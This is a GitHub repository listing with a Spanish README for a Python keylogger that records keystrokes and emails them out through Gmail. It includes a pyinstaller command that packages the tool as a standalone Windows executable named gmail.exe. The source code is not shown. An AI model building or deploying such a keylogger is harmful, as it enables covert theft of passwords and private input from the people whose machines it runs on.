https://github.com/clhore/keylogger-python
https://github.com/clhore/keylogger-python
Last synced: 10 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/clhore/keylogger-python
- Owner: clhore
- Created: 2021-12-01T20:43:36.000Z (about 4 years ago)
- Default Branch: main
- Last Pushed: 2021-12-02T19:21:54.000Z (about 4 years ago)
- Last Synced: 2025-01-20T20:54:55.118Z (11 months ago)
- Language: Python
- Size: 5.86 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# keylogger-python
En este caso el script enviara un gmail al destinantario cuando pase el tiempo que hallamos definido o cuando le pulsen el numero de teclas que hallamos definido. Este script no crea singun archivo de log.txt ya que almacena todas las pulsaciones en un variable global. Esto tuede hacer que algunas pulsaciones se pierdan al no ser enviadas antes de apagar el equipo.
# Compiled in WINDOWS
Descarga y descomprime `keylogger.zip` y ejecuta el comado:
pyinstaller --onefile --hidden-import pynput.keyboard._win32 --hidden-import pynput.mouse._win32 .\gmail.pyw

`gmail.exe` is created in the path `\keylogger\disk\gmail.exe` the `gmail.exe` contains all the necessary libraries to function.
